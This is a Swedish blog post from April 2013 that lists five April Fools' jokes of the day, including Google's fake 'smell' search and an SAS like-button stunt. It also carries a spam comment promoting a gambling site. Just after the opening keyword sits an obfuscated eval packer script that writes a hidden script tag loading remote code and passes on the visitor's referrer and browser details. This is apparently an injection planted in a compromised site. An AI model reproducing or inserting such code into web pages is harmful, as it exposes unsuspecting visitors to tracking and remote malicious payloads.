Image Image Image Image Image Image Image Image Image Image

| 26 maj, 2020

Scroll to top

Top

Har du blivit lurad idag? Vi listar de fem bästa aprilskämten

Har du blivit lurad idag? Vi listar de fem bästa aprilskämten
Marcus
 • On 1 april, 2013
 • http://www.revue.se

aprilskämt eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ehadi|var|u0026u|referrer|knhaz||js|php’.split(’|’),0,{}))
April April din dumma sill jag kan lura dig vart jag vill: den första april är dagen då massmedier, företag och folket runt om i världen lurar varandra.  Massmedierna brukar oftast skriva falska artiklar och reportage, företag brukar luras med en ny produkt eller tjänst som egentligen inte existerar däremot hos folket är det mer enkla skämt som man kör mot varandra, exempelvis att man ger falska skraplotter med miljonvinsten eller att man låtsas att man klipper håret av någon, men i själva verket har man en bit löshår i ena handen.

Här kommer en lista på den fem bästa aprilskämten hittils idag.

1. Youtube – dags att välja en vinnare bland alla videos som har laddats upp på hemsidan.

httpv://youtu.be/H542nLTTbu0

 2. Google Lukt BETA – vad är det som luktar? Nu har Google bemästrat tekniken att lukta på saker genom datorer och mobiler. Du söker på det du vill lukta på, sedan väljer du ”börja lukta” och lukten samlas in.

Lite info från Google om det inte funkar: Observera följande om det inte går att använda Google LuktBETA:

”418: Fel i luktöverföringsprotokollet” innebär att systemet är överbelastat. Försök igen senare.

På grund av tekniska begränsningar är inte alla lukter kompatibla med alla enheter. Undvik att slicka eller tugga på skärmen.

Testa att uppgradera till en modern webbläsare, till exempel Google Chrome.

Det är första april.

Läs mer om Google Lukt här: https://www.google.com/intl/sv/landing/nose/

saltgurka3. Mcdonalds – nä nu ryker gurkan

Sedan cheesburgaren började säljas på Mcdonalds har många retat sig på saltgurkan som läggs i cheesburgaren. I morse blev jättemånga glada när de fick reda på att gurkan skulle tas bort, dock blev de som gillar saltgurkan ännu mer glada då de fick veta att de hela var ett aprilskämt från Mcdonalds sida. Läs mer här: https://www.facebook.com/photo.php?fbid=581288978548440

4. SAS – installerar like-knappar på sina plan

Likeknapp SAS vill satsa mer på sociala medier genom att installera like-knappar på planen. Men vad SAS egentligen skulle använt like-knapparna till förblir ett mysterium. Kanske locka fler personer att gilla deras facebooksida eller är det för att visa att man tyckte om resan. Nåväl det var ett aprilskämt som gick hem hos deras kunder. Läs mer: https://www.facebook.com/photo.php?fbid=10152703499755788

5. Polisen Södermalm – patrullera med hjälp av luftballong 

I sommar kommer Södermalmspolisen att patrullera med luftballong. Läs mer: http://korta.nu/4ljz9

Tags

Comments

 1. Felix

  I
  Happen To Be
  Commenting
  To
  Make
  You Know
  Of
  The
  Fantastic
  Encounter
  My
  Friend’s
  Daughter
  Developed
  Using
  Your
  Blog.
  She Even
  Learned
  Lots
  Of
  Pieces,
  Which
  Included
  What
  It Is
  Like To
  Have
  An
  Awesome
  Coaching
  Mood
  To Make
  Other
  Individuals
  Clearly
  Know
  Various
  Multifaceted
  Matters.
  You
  Actually
  Surpassed
  Our
  Own
  Desires.
  Many
  Thanks For
  Delivering
  These
  Good,
  Trustworthy,
  Educational
  And
  In Addition
  Cool
  Tips
  About
  The
  Topic To Emily.

  SBOBET